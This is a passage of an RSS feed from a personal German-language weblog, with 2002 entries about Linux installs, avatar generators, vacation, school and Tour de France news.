  16466.    <content:encoded><![CDATA[<table style="border: 0; width: 100%"><tr><td style="width: 84px"><img src="https://blog.x-way.org/images/avatar.gif" alt="Avatar" height="125" width="65"></td><td>Bei <a href="http://www.avatomatic.de/" target="_blank"><b>avatomatic.de</b></a> gibt es eine weitere "Personendarstellungsmaschine". So kommt zu <a href="http://waterwave.ch/weblog/detail.php?id=16">den</a> <a href="http://waterwave.ch/weblog/about.php">schon</a> <a href="http://waterwave.ch/weblog/detail.php?id=25">vorhandenen</a> noch ein weiteres Selbstbildnis dazu.<br>Gefunden bei <a href="http://www.mytzwaen.de/" target="_blank"><b>tzwaen</b></a></td></tr></table>
  16467. ]]></content:encoded>
  16468.  </item>
  16469.  
  16470.  <item>
  16471.    <title>Weblog Stammbaum</title>
  16472.    <link>https://blog.x-way.org/Misc/2002/08/05/Weblog_Stammbaum.html</link>
  16473.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=39</guid>
  16474.    <dc:creator>Andreas Jaggi</dc:creator>
  16475.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16476.    <pubDate>Mon, 05 Aug 2002 16:28:00 +0000</pubDate>
  16477.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16478.    <description><![CDATA[<br><a href="https://web.archive.org/web/20030925212731/http://www.blogtree.com/blogtree.php?blogid=1265" title="Blog Pedigree" target="_blank"><img alt="Blog Pedigree Logo" src="https://blog.x-way.org/images/bt_link_4.gif" width="80" height="18"></a><br><br>Auf <a href="https://web.archive.org/web/20020914044224/blogtree.com" target="_blank"><b>blogtree.com</b></a> kann man seinen Weblog eintragen und die "Eltern" seines Weblogs angeben. Leider erinnere ich mich nicht mehr an alle Weblogs, welche zur Entstehung des x-log beigetragen haben. Wer sich vergessen fühlt soll sich melden. ;-)<br><br>Gefunden bei <a href="http://www.pepilog.de" target="_blank"><b>Pepino</b></a>
  16479. ]]></description>
  16480.    <content:encoded><![CDATA[<br><a href="https://web.archive.org/web/20030925212731/http://www.blogtree.com/blogtree.php?blogid=1265" title="Blog Pedigree" target="_blank"><img alt="Blog Pedigree Logo" src="https://blog.x-way.org/images/bt_link_4.gif" width="80" height="18"></a><br><br>Auf <a href="https://web.archive.org/web/20020914044224/blogtree.com" target="_blank"><b>blogtree.com</b></a> kann man seinen Weblog eintragen und die "Eltern" seines Weblogs angeben. Leider erinnere ich mich nicht mehr an alle Weblogs, welche zur Entstehung des x-log beigetragen haben. Wer sich vergessen fühlt soll sich melden. ;-)<br><br>Gefunden bei <a href="http://www.pepilog.de" target="_blank"><b>Pepino</b></a>
  16481. ]]></content:encoded>
  16482.  </item>
  16483.  
  16484.  <item>
  16485.    <title>Linux läuft wieder</title>
  16486.    <link>https://blog.x-way.org/Linux/2002/07/28/Linux_laeuft_wieder.html</link>
  16487.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=38</guid>
  16488.    <dc:creator>Andreas Jaggi</dc:creator>
  16489.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16490.    <pubDate>Sun, 28 Jul 2002 21:42:00 +0000</pubDate>
  16491.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16492.    <description><![CDATA[Diesmal ist es nicht mehr die <a href="http://waterwave.ch/weblog/detail.php?id=28">hier</a> erwähnte ICE-Linux Distribution sondern <a href="http://www.redhat.de/" target="_blank"><b>Redhat 7.3</b></a>. Mit <a href="http://www.kde.org/" target="_blank">KDE</a> konnte ich mich nicht anfreunden. Deshalb dien jetzt <a href="http://www.ximian.com/products/ximian_desktop/" target="_blank"><b>Ximian-Gnome</b></a> als Desktop Umgebung. Fenstermanager ist der standartmässig eingebundene Sawfish.<br><a href="https://blog.x-way.org/images/aqua.png"><b>Hier</b></a> gibts auch noch einen aktuellen Screenshot.<br>(Einen richtiger Mac kann ich mir finanziell leider noch nicht leisten. Für Spenden bitte brieflich mit mir <a href="http://waterwave.ch/weblog/about.php"><b>Kontakt</b></a> aufnehmen. ;-)
  16493. ]]></description>
  16494.    <content:encoded><![CDATA[Diesmal ist es nicht mehr die <a href="http://waterwave.ch/weblog/detail.php?id=28">hier</a> erwähnte ICE-Linux Distribution sondern <a href="http://www.redhat.de/" target="_blank"><b>Redhat 7.3</b></a>. Mit <a href="http://www.kde.org/" target="_blank">KDE</a> konnte ich mich nicht anfreunden. Deshalb dien jetzt <a href="http://www.ximian.com/products/ximian_desktop/" target="_blank"><b>Ximian-Gnome</b></a> als Desktop Umgebung. Fenstermanager ist der standartmässig eingebundene Sawfish.<br><a href="https://blog.x-way.org/images/aqua.png"><b>Hier</b></a> gibts auch noch einen aktuellen Screenshot.<br>(Einen richtiger Mac kann ich mir finanziell leider noch nicht leisten. Für Spenden bitte brieflich mit mir <a href="http://waterwave.ch/weblog/about.php"><b>Kontakt</b></a> aufnehmen. ;-)
  16495. ]]></content:encoded>
  16496.  </item>
  16497.  
  16498.  <item>
  16499.    <title>Temperatur kann schrecklich sein</title>
  16500.    <link>https://blog.x-way.org/Misc/2002/07/22/Temperatur_kann_schrecklich_sein.html</link>
  16501.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=37</guid>
  16502.    <dc:creator>Andreas Jaggi</dc:creator>
  16503.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16504.    <pubDate>Mon, 22 Jul 2002 22:09:00 +0000</pubDate>
  16505.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16506.    <description><![CDATA[Besonders wenn man gestern vom Atlantik zurückgekommen ist und heute eine Bergwanderung auf <b>3000</b> Meter über Meer macht!<br><br>Was soviel heissen will, dass ich aus Frankreich zurück bin und mir hier schrecklich kalt ist. <a href="https://blog.x-way.org/stuff/tumattendsaparis.txt"><b>Dieses</b></a> Gedicht handelt zwar nicht von meinem Ferienort, hat mir aber trotzdem so sehr gefallen, dass ich's jetzt <a href="https://blog.x-way.org/stuff/tumattendsaparis.txt">hierhin</a> mitbringe. Und (falls es jemanden ausser mir interessiert) irgendwann gibts noch einen (kleinen) Ferienbericht mit Photos.
  16507. ]]></description>
  16508.    <content:encoded><![CDATA[Besonders wenn man gestern vom Atlantik zurückgekommen ist und heute eine Bergwanderung auf <b>3000</b> Meter über Meer macht!<br><br>Was soviel heissen will, dass ich aus Frankreich zurück bin und mir hier schrecklich kalt ist. <a href="https://blog.x-way.org/stuff/tumattendsaparis.txt"><b>Dieses</b></a> Gedicht handelt zwar nicht von meinem Ferienort, hat mir aber trotzdem so sehr gefallen, dass ich's jetzt <a href="https://blog.x-way.org/stuff/tumattendsaparis.txt">hierhin</a> mitbringe. Und (falls es jemanden ausser mir interessiert) irgendwann gibts noch einen (kleinen) Ferienbericht mit Photos.
  16509. ]]></content:encoded>
  16510.  </item>
  16511.  
  16512.  <item>
  16513.    <title>Moustey</title>
  16514.    <link>https://blog.x-way.org/Misc/2002/07/11/Moustey.html</link>
  16515.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=36</guid>
  16516.    <dc:creator>Andreas Jaggi</dc:creator>
  16517.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16518.    <pubDate>Thu, 11 Jul 2002 13:55:00 +0000</pubDate>
  16519.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16520.    <description><![CDATA[heisst der <a href="https://web.archive.org/web/20020626075736/http://www.tourisme-landes.com/Moustey.html" target="_blank"><b>Ort</b></a>, wo ich die nächsten 10 Tage etwas Erholung suchen werde. ;-)<br><br><div style="width: 100%; text-align: center"><img src="https://blog.x-way.org/images/pins.jpg" height="186" width="325" style="border: 1px solid #000000;" alt="Seekiefern in Moustey"></div><br><b>Schöne Ferien!</b>
  16521. ]]></description>
  16522.    <content:encoded><![CDATA[heisst der <a href="https://web.archive.org/web/20020626075736/http://www.tourisme-landes.com/Moustey.html" target="_blank"><b>Ort</b></a>, wo ich die nächsten 10 Tage etwas Erholung suchen werde. ;-)<br><br><div style="width: 100%; text-align: center"><img src="https://blog.x-way.org/images/pins.jpg" height="186" width="325" style="border: 1px solid #000000;" alt="Seekiefern in Moustey"></div><br><b>Schöne Ferien!</b>
  16523. ]]></content:encoded>
  16524.  </item>
  16525.  
  16526.  <item>
  16527.    <title>Ist das bedenklich?</title>
  16528.    <link>https://blog.x-way.org/Misc/2002/07/10/Ist_das_bedenklich.html</link>
  16529.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=35</guid>
  16530.    <dc:creator>Andreas Jaggi</dc:creator>
  16531.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16532.    <pubDate>Wed, 10 Jul 2002 23:21:00 +0000</pubDate>
  16533.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16534.    <description><![CDATA[<a href="https://blog.x-way.org/images/w2k-10072002.gif"><b>Hier</b></a> ist ersichtlich wie es um meine Windows Partitionen steht. Schon lustig wie man fast 40% einer Partition mit fragmentierten Daten <b>zumüllen</b> kann. ;o)
  16535. ]]></description>
  16536.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/w2k-10072002.gif"><b>Hier</b></a> ist ersichtlich wie es um meine Windows Partitionen steht. Schon lustig wie man fast 40% einer Partition mit fragmentierten Daten <b>zumüllen</b> kann. ;o)
  16537. ]]></content:encoded>
  16538.  </item>
  16539.  
  16540.  <item>
  16541.    <title>Schade, dass ...</title>
  16542.    <link>https://blog.x-way.org/Misc/2002/07/09/Schade_dass_.html</link>
  16543.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=34</guid>
  16544.    <dc:creator>Andreas Jaggi</dc:creator>
  16545.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16546.    <pubDate>Tue, 09 Jul 2002 19:22:00 +0000</pubDate>
  16547.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16548.    <description><![CDATA[<br><img src="https://blog.x-way.org/images/bertogliati.jpg" width="120" height="100" alt="Rubens Bertogliati" title="Rubens Bertogliati" style="border: 1px solid #000000;"><br><br>... <b><a href="https://web.archive.org/web/20031023032456/http://www.letour.fr/2002/fr/coureur.oft?service=RaceServer&amp;RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=153" target="_blank">Rubens</a> <a href="https://web.archive.org/web/20040126042104/http://www.eurosport.com/person.asp?PersonID=17511&amp;LangueID=1&amp;SportID=18" target="_blank">Bertogliati</a></b> das <a href="https://web.archive.org/web/20020811222623/http://imageserver.havasadvertisingsports.net/ImageServer.asp?Path=/Oneup/FanAvenueV2/Multimedia/Produits/&amp;name=pro2.jpg&amp;width=500&amp;height=375&amp;proportion=1&amp;format=jpeg&amp;quality=40" target="_blank"><b>maillot jaune</b></a> an <b><a href="https://web.archive.org/web/20020803151933/http://www.letour.fr/2002/fr/coureur.oft?service=RaceServer&amp;RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=011" target="_blank">Erik</a> <a href="https://web.archive.org/web/20040126041257/http://www.eurosport.com/person.asp?PersonID=874&amp;LangueID=1&amp;SportID=18" target="_blank">Zabel</a></b> abgeben musste. Aber das wird sich im Verlauf der <a href="http://www.letour.fr/" target="_blank"><b>Tour de France</b></a> sicherlich noch mehrmals ändern ...
  16549. ]]></description>
  16550.    <content:encoded><![CDATA[<br><img src="https://blog.x-way.org/images/bertogliati.jpg" width="120" height="100" alt="Rubens Bertogliati" title="Rubens Bertogliati" style="border: 1px solid #000000;"><br><br>... <b><a href="https://web.archive.org/web/20031023032456/http://www.letour.fr/2002/fr/coureur.oft?service=RaceServer&amp;RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=153" target="_blank">Rubens</a> <a href="https://web.archive.org/web/20040126042104/http://www.eurosport.com/person.asp?PersonID=17511&amp;LangueID=1&amp;SportID=18" target="_blank">Bertogliati</a></b> das <a href="https://web.archive.org/web/20020811222623/http://imageserver.havasadvertisingsports.net/ImageServer.asp?Path=/Oneup/FanAvenueV2/Multimedia/Produits/&amp;name=pro2.jpg&amp;width=500&amp;height=375&amp;proportion=1&amp;format=jpeg&amp;quality=40" target="_blank"><b>maillot jaune</b></a> an <b><a href="https://web.archive.org/web/20020803151933/http://www.letour.fr/2002/fr/coureur.oft?service=RaceServer&amp;RaceType=TDF&amp;RaceYear=2002&amp;Language=FRA&amp;PersonName=011" target="_blank">Erik</a> <a href="https://web.archive.org/web/20040126041257/http://www.eurosport.com/person.asp?PersonID=874&amp;LangueID=1&amp;SportID=18" target="_blank">Zabel</a></b> abgeben musste. Aber das wird sich im Verlauf der <a href="http://www.letour.fr/" target="_blank"><b>Tour de France</b></a> sicherlich noch mehrmals ändern ...
  16551. ]]></content:encoded>
  16552.  </item>
  16553.  
  16554.  <item>
  16555.    <title>Unix-AG</title>
  16556.    <link>https://blog.x-way.org/Linux/2002/07/08/Unix-AG.html</link>
  16557.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=33</guid>
  16558.    <dc:creator>Andreas Jaggi</dc:creator>
  16559.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16560.    <pubDate>Mon, 08 Jul 2002 19:55:00 +0000</pubDate>
  16561.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16562.    <description><![CDATA[Die <a href="https://web.archive.org/web/20020725165737/http://www.unix-ag.sv.uni-saarland.de/" target="_blank"><b>Unix-AG</b></a> bietet auf ihrer Website viele Infos rund um Unix/Linux. IMHO sehr hilfreich für Um- und Einsteiger wie mich. Besonders die <a href="https://web.archive.org/web/20020806210345/http://www.unix-ag.sv.uni-saarland.de/Links/Newbies.shtml" target="_blank"><b>Links für Einsteiger</b></a> haben mir grosse Freude (und Erleichterung) ;-) bereitet.
  16563. ]]></description>
  16564.    <content:encoded><![CDATA[Die <a href="https://web.archive.org/web/20020725165737/http://www.unix-ag.sv.uni-saarland.de/" target="_blank"><b>Unix-AG</b></a> bietet auf ihrer Website viele Infos rund um Unix/Linux. IMHO sehr hilfreich für Um- und Einsteiger wie mich. Besonders die <a href="https://web.archive.org/web/20020806210345/http://www.unix-ag.sv.uni-saarland.de/Links/Newbies.shtml" target="_blank"><b>Links für Einsteiger</b></a> haben mir grosse Freude (und Erleichterung) ;-) bereitet.
  16565. ]]></content:encoded>
  16566.  </item>
  16567.  
  16568.  <item>
  16569.    <title>PHP</title>
  16570.    <link>https://blog.x-way.org/Coding/2002/07/08/PHP.html</link>
  16571.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=32</guid>
  16572.    <dc:creator>Andreas Jaggi</dc:creator>
  16573.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16574.    <pubDate>Mon, 08 Jul 2002 19:20:00 +0000</pubDate>
  16575.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16576.    <description><![CDATA[Auf <a href="http://www.stefan-fischer.net/" target="_blank"><b>http://www.stefan-fischer.net/</b></a> hat es verschiedene PHP-Klassen, unter anderem auch zum Thema XML/RSS. Vielleicht kann der/die eine oder andere etwas davon für seinen Weblog brauchen (mir ist's so ergangen) :-)
  16577. ]]></description>
  16578.    <content:encoded><![CDATA[Auf <a href="http://www.stefan-fischer.net/" target="_blank"><b>http://www.stefan-fischer.net/</b></a> hat es verschiedene PHP-Klassen, unter anderem auch zum Thema XML/RSS. Vielleicht kann der/die eine oder andere etwas davon für seinen Weblog brauchen (mir ist's so ergangen) :-)
  16579. ]]></content:encoded>
  16580.  </item>
  16581.  
  16582.  <item>
  16583.    <title>«Wer alle Ziele erreicht, hat sie zu tief gesetzt.»</title>
  16584.    <link>https://blog.x-way.org/Tech/2002/07/07/Wer_alle_Ziele_erreicht_hat_sie_zu_tief_gesetzt.html</link>
  16585.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=31</guid>
  16586.    <dc:creator>Andreas Jaggi</dc:creator>
  16587.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16588.    <pubDate>Sun, 07 Jul 2002 16:59:00 +0000</pubDate>
  16589.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  16590.    <description><![CDATA[Nach diesem Motto lebt der Betreiber <a href="http://www.stefan-lenz.ch/" target="_blank"><b>dieser</b> Website</a>. Dort findet man einen "öffentlichen und für jedermann/frau zugänglichen Wissensspeicher".<br>IMHO gute und aktuelle Artikel. Unbedingt besuchen, hat für jeden etwas.
  16591. ]]></description>
  16592.    <content:encoded><![CDATA[Nach diesem Motto lebt der Betreiber <a href="http://www.stefan-lenz.ch/" target="_blank"><b>dieser</b> Website</a>. Dort findet man einen "öffentlichen und für jedermann/frau zugänglichen Wissensspeicher".<br>IMHO gute und aktuelle Artikel. Unbedingt besuchen, hat für jeden etwas.
  16593. ]]></content:encoded>
  16594.  </item>
  16595.  
  16596.  <item>
  16597.    <title>Schliesslich hab ich Ferien...</title>
  16598.    <link>https://blog.x-way.org/Misc/2002/07/06/Schliesslich_hab_ich_Ferien.html</link>
  16599.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=30</guid>
  16600.    <dc:creator>Andreas Jaggi</dc:creator>
  16601.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16602.    <pubDate>Sat, 06 Jul 2002 10:01:00 +0000</pubDate>
  16603.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16604.    <description><![CDATA[<br><a href="https://web.archive.org/web/20020609151755/http://sadworld.piranho.com/tests3/faulheit.html" target="_blank"><img src="https://blog.x-way.org/images/haenge8.jpg" alt="ich bin zu 100% faul" style="border: 1px solid #000000;"></a>
  16605. ]]></description>
  16606.    <content:encoded><![CDATA[<br><a href="https://web.archive.org/web/20020609151755/http://sadworld.piranho.com/tests3/faulheit.html" target="_blank"><img src="https://blog.x-way.org/images/haenge8.jpg" alt="ich bin zu 100% faul" style="border: 1px solid #000000;"></a>
  16607. ]]></content:encoded>
  16608.  </item>
  16609.  
  16610.  <item>
  16611.    <title>Projektwoche</title>
  16612.    <link>https://blog.x-way.org/Misc/2002/07/01/Projektwoche.html</link>
  16613.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=29</guid>
  16614.    <dc:creator>Andreas Jaggi</dc:creator>
  16615.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16616.    <pubDate>Mon, 01 Jul 2002 07:56:00 +0000</pubDate>
  16617.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16618.    <description><![CDATA[Nun ist es soweit. Wie schon <a href="http://waterwave.ch/weblog/detail.php?id=26">angekündigt</a>, beginnt heute die Projektwoche unserer Schule. Dazu dürfen wir heute mit dem Fahrrad <a href="http://www.koeniz.ch/" target="_blank"><b>dahin</b></a> radeln.<br>Leider sieht es so aus, dass ich während dieser Zeit nicht ins Internet kann -> kein Weblog. <b>:-(</b>
  16619. ]]></description>
  16620.    <content:encoded><![CDATA[Nun ist es soweit. Wie schon <a href="http://waterwave.ch/weblog/detail.php?id=26">angekündigt</a>, beginnt heute die Projektwoche unserer Schule. Dazu dürfen wir heute mit dem Fahrrad <a href="http://www.koeniz.ch/" target="_blank"><b>dahin</b></a> radeln.<br>Leider sieht es so aus, dass ich während dieser Zeit nicht ins Internet kann -> kein Weblog. <b>:-(</b>
  16621. ]]></content:encoded>
  16622.  </item>
  16623.  
  16624.  <item>
  16625.    <title>Linux</title>
  16626.    <link>https://blog.x-way.org/Linux/2002/06/30/Linux.html</link>
  16627.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=28</guid>
  16628.    <dc:creator>Andreas Jaggi</dc:creator>
  16629.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16630.    <pubDate>Sun, 30 Jun 2002 03:19:00 +0000</pubDate>
  16631.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16632.    <description><![CDATA[<a href="https://web.archive.org/web/20020726072457/http://www.icepack-linux.de/" target="_blank"><b>icepack linux 2</b></a> nennt sich die Distribution, welche es geschafft hat neben meinem Win2k auf der selben Platte installiert zu werden. Massgebend dazu beigetragen hat der benutzerfreundliche GUI-Installationsmanager mit einem Partitionsmanager mit schon fast <a href="https://web.archive.org/web/20020602054744/http://www.powerquest.com/de/PartitionMagic/index.html" target="_blank"><b>Partition Magic</b></a> ähnlichen Funktionen.<br>Damit habe ich für mein Dualboot-System eine NTFS-Partition zur gemeinsamen Nutzung erstellt. Nun will aber Linux unter keinen Umständen darauf schreiben können. Weiss vielleicht gerade jemand wie man dieses "readonly" Zeugs wegmachen kann?<br>Zu diesem Anlass gibt es natürlich auch einen <a href="https://blog.x-way.org/images/30062002.jpg"><b>Screenshot</b></a>.
  16633. ]]></description>
  16634.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20020726072457/http://www.icepack-linux.de/" target="_blank"><b>icepack linux 2</b></a> nennt sich die Distribution, welche es geschafft hat neben meinem Win2k auf der selben Platte installiert zu werden. Massgebend dazu beigetragen hat der benutzerfreundliche GUI-Installationsmanager mit einem Partitionsmanager mit schon fast <a href="https://web.archive.org/web/20020602054744/http://www.powerquest.com/de/PartitionMagic/index.html" target="_blank"><b>Partition Magic</b></a> ähnlichen Funktionen.<br>Damit habe ich für mein Dualboot-System eine NTFS-Partition zur gemeinsamen Nutzung erstellt. Nun will aber Linux unter keinen Umständen darauf schreiben können. Weiss vielleicht gerade jemand wie man dieses "readonly" Zeugs wegmachen kann?<br>Zu diesem Anlass gibt es natürlich auch einen <a href="https://blog.x-way.org/images/30062002.jpg"><b>Screenshot</b></a>.
  16635. ]]></content:encoded>
  16636.  </item>
  16637.  
  16638.  <item>
  16639.    <title>3D-Artwork</title>
  16640.    <link>https://blog.x-way.org/Webdesign/2002/06/27/3D-Artwork.html</link>
  16641.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=27</guid>
  16642.    <dc:creator>Andreas Jaggi</dc:creator>
  16643.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16644.    <pubDate>Thu, 27 Jun 2002 19:30:00 +0000</pubDate>
  16645.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  16646.    <description><![CDATA[Wundervolle virtuelle Welten findet man <a href="http://www.digitalblasphemy.com/" target="_blank"><b>hier</b></a>, <a href="https://web.archive.org/web/20020604185615/http://go.to/innerdreams" target="_blank"><b>hier</b></a> und <a href="https://web.archive.org/web/20020604055903/http://www.moodflow.com/" target="_blank"><b>hier</b></a>.
  16647. ]]></description>
  16648.    <content:encoded><![CDATA[Wundervolle virtuelle Welten findet man <a href="http://www.digitalblasphemy.com/" target="_blank"><b>hier</b></a>, <a href="https://web.archive.org/web/20020604185615/http://go.to/innerdreams" target="_blank"><b>hier</b></a> und <a href="https://web.archive.org/web/20020604055903/http://www.moodflow.com/" target="_blank"><b>hier</b></a>.
  16649. ]]></content:encoded>
  16650.  </item>
  16651.  
  16652.  <item>
  16653.    <title>Schlaf...</title>
  16654.    <link>https://blog.x-way.org/Misc/2002/06/26/Schlaf.html</link>
  16655.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=26</guid>
  16656.    <dc:creator>Andreas Jaggi</dc:creator>
  16657.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16658.    <pubDate>Wed, 26 Jun 2002 23:54:00 +0000</pubDate>
  16659.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16660.    <description><![CDATA[Da ich wie schon <a href="http://waterwave.ch/weblog/detail.php?id=24">gesagt</a> in dieser Woche nichts mehr für die Schule
  16661.  
  16662. machen muss, ist bei mir ein (noch) ungedecktes Bedürfnis nach Schlaf und Erholung aufgekommen. Und da ich in den letzen
  16663.  
  16664. paar Wochen durchschnittlich weniger als <b>4</b> Stunden Schlaf gefunden habe, habe ich während der letzen Tage in meiner
  16665.  
  16666. Freizeit nur geschlafen. Seit dem Wochenende blieb mein Computer ausgeschaltet, die Aufgaben unerledigt und der Weblog wurde
  16667.  
  16668. auch nicht aktualisiert.<br>Das soll sich nun wieder bessern und dieser Eintrag ist der Anfang dazu. Leider sieht es aber in
  16669.  
  16670. nächster Zeit auch nicht allzugut aus, da ich nächste Woche im Zuge einer Projektwoche eine Woche <b>ohne</b> Internet
  16671.  
  16672. verbringen muss. <b>:-(</b><br>Bis dann, so hoffe ich wenigstens, wird dann auch mein Template basierendes Layout fertig
  16673.  
  16674. programmiert sein, was den Weblog noch etwas erweitern wird.
  16675. ]]></description>
  16676.    <content:encoded><![CDATA[Da ich wie schon <a href="http://waterwave.ch/weblog/detail.php?id=24">gesagt</a> in dieser Woche nichts mehr für die Schule
  16677.  
  16678. machen muss, ist bei mir ein (noch) ungedecktes Bedürfnis nach Schlaf und Erholung aufgekommen. Und da ich in den letzen
  16679.  
  16680. paar Wochen durchschnittlich weniger als <b>4</b> Stunden Schlaf gefunden habe, habe ich während der letzen Tage in meiner
  16681.  
  16682. Freizeit nur geschlafen. Seit dem Wochenende blieb mein Computer ausgeschaltet, die Aufgaben unerledigt und der Weblog wurde
  16683.  
  16684. auch nicht aktualisiert.<br>Das soll sich nun wieder bessern und dieser Eintrag ist der Anfang dazu. Leider sieht es aber in
  16685.  
  16686. nächster Zeit auch nicht allzugut aus, da ich nächste Woche im Zuge einer Projektwoche eine Woche <b>ohne</b> Internet
  16687.  
  16688. verbringen muss. <b>:-(</b><br>Bis dann, so hoffe ich wenigstens, wird dann auch mein Template basierendes Layout fertig
  16689.  
  16690. programmiert sein, was den Weblog noch etwas erweitern wird.
  16691. ]]></content:encoded>
  16692.  </item>
  16693.  
  16694.  <item>
  16695.    <title>LEGO</title>
  16696.    <link>https://blog.x-way.org/Misc/2002/06/22/LEGO.html</link>
  16697.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=25</guid>
  16698.    <dc:creator>Andreas Jaggi</dc:creator>
  16699.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16700.    <pubDate>Sat, 22 Jun 2002 16:07:00 +0000</pubDate>
  16701.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16702.    <description><![CDATA[Wieder einmal ein Selbstbildnis. (Die anderen findet man <a href="http://waterwave.ch/weblog/detail.php?id=16">hier</a> und <a href="http://waterwave.ch/weblog/about.php">hier</a>)<br><img src="https://blog.x-way.org/images/legoxway.jpg" height="269" width="155" alt="legoxway"><br>Diesmal gefunden bei <a href="http://tzwaen.auf123.de/?diverses/avatare" target="_blank"><b>Twaen</b></a> und hergestellt <a href="http://www.reasonablyclever.com/" target="_blank"><b>hier</b></a>.
  16703. ]]></description>
  16704.    <content:encoded><![CDATA[Wieder einmal ein Selbstbildnis. (Die anderen findet man <a href="http://waterwave.ch/weblog/detail.php?id=16">hier</a> und <a href="http://waterwave.ch/weblog/about.php">hier</a>)<br><img src="https://blog.x-way.org/images/legoxway.jpg" height="269" width="155" alt="legoxway"><br>Diesmal gefunden bei <a href="http://tzwaen.auf123.de/?diverses/avatare" target="_blank"><b>Twaen</b></a> und hergestellt <a href="http://www.reasonablyclever.com/" target="_blank"><b>hier</b></a>.
  16705. ]]></content:encoded>
  16706.  </item>
  16707.  
  16708.  <item>
  16709.    <title>Endlich...</title>
  16710.    <link>https://blog.x-way.org/Misc/2002/06/22/Endlich.html</link>
  16711.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=24</guid>
  16712.    <dc:creator>Andreas Jaggi</dc:creator>
  16713.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16714.    <pubDate>Sat, 22 Jun 2002 14:31:00 +0000</pubDate>
  16715.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16716.    <description><![CDATA[Gestern hatte ich meine <b>letze Probe dieses Schuljahrs</b> geschrieben. (Über Ehe-, Kinds-, Scheidungs-, Güter- und Erbrecht) Und ich hatte erst noch ein gutes Gefühl beim Probeschreiben. ;-)<br>Nun habe ich bis im August keine schulischen Anstrengungen mehr zu machen.<br><b>Yeehaw!</b><br>Leider muss ich nächste Woche noch einigermassen vernünftig die Schule besuchen, denn Notenschluss ist erst am 26.6. Aber dennoch: <b>Endlich Zeit</b> für alle Dinge, die ich während der letzten Wochen zurückstellen musste.
  16717. ]]></description>
  16718.    <content:encoded><![CDATA[Gestern hatte ich meine <b>letze Probe dieses Schuljahrs</b> geschrieben. (Über Ehe-, Kinds-, Scheidungs-, Güter- und Erbrecht) Und ich hatte erst noch ein gutes Gefühl beim Probeschreiben. ;-)<br>Nun habe ich bis im August keine schulischen Anstrengungen mehr zu machen.<br><b>Yeehaw!</b><br>Leider muss ich nächste Woche noch einigermassen vernünftig die Schule besuchen, denn Notenschluss ist erst am 26.6. Aber dennoch: <b>Endlich Zeit</b> für alle Dinge, die ich während der letzten Wochen zurückstellen musste.
  16719. ]]></content:encoded>
  16720.  </item>
  16721.  
  16722.  <item>
  16723.    <title>XML-Log</title>
  16724.    <link>https://blog.x-way.org/Coding/2002/06/20/XML-Log.html</link>
  16725.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=23</guid>
  16726.    <dc:creator>Andreas Jaggi</dc:creator>
  16727.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16728.    <pubDate>Thu, 20 Jun 2002 23:22:00 +0000</pubDate>
  16729.    <category domain="https://blog.x-way.org/Coding">Coding</category>
